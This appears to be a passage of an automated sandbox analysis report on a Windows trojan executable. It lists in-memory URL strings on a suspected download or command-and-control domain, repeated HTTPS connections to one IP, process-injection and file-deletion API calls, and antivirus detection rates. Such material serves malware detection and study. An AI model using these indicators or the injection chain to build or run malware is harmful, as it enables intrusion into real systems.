            Source: UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com:80/245_Aiymwhpjxsg20F
            Source: UAHIzSm2x2.exe, 00000000.00000003.2897902282.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com:80/245_Aiymwhpjxsg8
            Source: UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com:80/245_AiymwhpjxsgW
            Source: UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com:80/245_Aiymwhpjxsgg
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com:80/245_Aiymwhpjxsgg2
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com:80/245_AiymwhpjxsggT
            Source: UAHIzSm2x2.exe, 00000000.00000003.2897902282.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com:80/245_Aiymwhpjxsggclose
            Source: UAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com:80/245_Aiymwhpjxsgged
            Source: UAHIzSm2x2.exe, 00000000.00000003.3053706651.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2301934670.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2418848234.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2897902282.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2282231341.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsM
            Source: UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000858000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2282231341.000000000082D000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956388004.0000000000858000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000079E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/
            Source: UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Aiymwhpjxsg
            Source: UAHIzSm2x2.exe, 00000000.00000003.2301934670.0000000000862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Aiymwhpjxsg0
            Source: UAHIzSm2x2.exe, 00000000.00000003.2282231341.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_AiymwhpjxsgJh
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000081B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2898002791.000000000081B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_AiymwhpjxsgLocationETagAuthentication-InfoAgeAccept-RangesLast-Modified
            Source: UAHIzSm2x2.exe, 00000000.00000003.2301934670.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_AiymwhpjxsgWk
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000079E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_AiymwhpjxsgX
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000861000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.0000000000861000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000853000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000085F000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2897902282.000000000085F000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2418848234.000000000085F000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Aiymwhpjxsgc
            Source: UAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Aiymwhpjxsgk
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000861000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000853000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Aiymwhpjxsgx
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Aiymwhpjxsgy
            Source: UAHIzSm2x2.exe, 00000000.00000003.2898002791.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/5
            Source: UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/U
            Source: UAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/W
            Source: UAHIzSm2x2.exe, 00000000.00000003.2956388004.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/u
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000084A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com45_Aiymwhpjxsgb
            Source: UAHIzSm2x2.exe, 00000000.00000003.2956290671.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Aiymwhpjxsg
            Source: UAHIzSm2x2.exe, 00000000.00000003.2897902282.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Aiymwhpjxsg2
            Source: UAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_AiymwhpjxsgT
            Source: UAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Aiymwhpjxsgclose
            Source: UAHIzSm2x2.exe, 00000000.00000003.2897902282.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Aiymwhpjxsged
            Source: UAHIzSm2x2.exe, 00000000.00000003.2897902282.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Aiymwhpjxsgerse
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
            Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
            Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
            Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
            Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
            Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
            Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
            Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
            Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
            Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
            Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
            Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
            Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
            Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
            Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
            Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
            Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
            Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
            Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
            Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49761 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49777 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49794 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49806 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49824 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49841 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49856 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49871 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49881 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49896 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49909 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49926 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49941 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49953 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49966 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49982 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49998 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50010 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50027 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50029 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50031 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50033 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50035 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50038 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50040 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50042 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50044 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50046 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50048 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50050 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50052 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50055 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50057 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50059 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50061 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50063 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50065 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50067 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50069 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50071 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50073 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50075 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50077 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50079 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50081 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50083 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50085 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50087 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50090 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50092 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50094 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50096 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50098 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50100 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50102 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50104 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50106 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50108 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50110 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50112 version: TLS 1.2
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028ADFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_028ADFE4
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A7CF8 NtWriteVirtualMemory,0_2_028A7CF8
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A8BA8 GetThreadContext,SetThreadContext,NtResumeThread,0_2_028A8BA8
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A8BA6 GetThreadContext,SetThreadContext,NtResumeThread,0_2_028A8BA6
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028ADE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_028ADE24
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028ADE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_028ADE78
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028ADF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_028ADF00
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028AF0A8 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_028AF0A8
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028920C40_2_028920C4
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028BE5960_2_028BE596
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: String function: 028A8798 appears 54 times
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: String function: 028944D0 appears 33 times
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: String function: 028A881C appears 45 times
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: String function: 028944AC appears 74 times
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: String function: 0289480C appears 931 times
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: String function: 028946A4 appears 244 times
            Source: UAHIzSm2x2.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: classification engineClassification label: mal84.troj.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_02897F52 GetDiskFreeSpaceA,0_2_02897F52
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A6D48 CoCreateInstance,0_2_028A6D48
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: UAHIzSm2x2.exeVirustotal: Detection: 77%
            Source: UAHIzSm2x2.exeReversingLabs: Detection: 87%
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeFile read: C:\Users\user\Desktop\UAHIzSm2x2.exeJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: url.dllJump to behavior
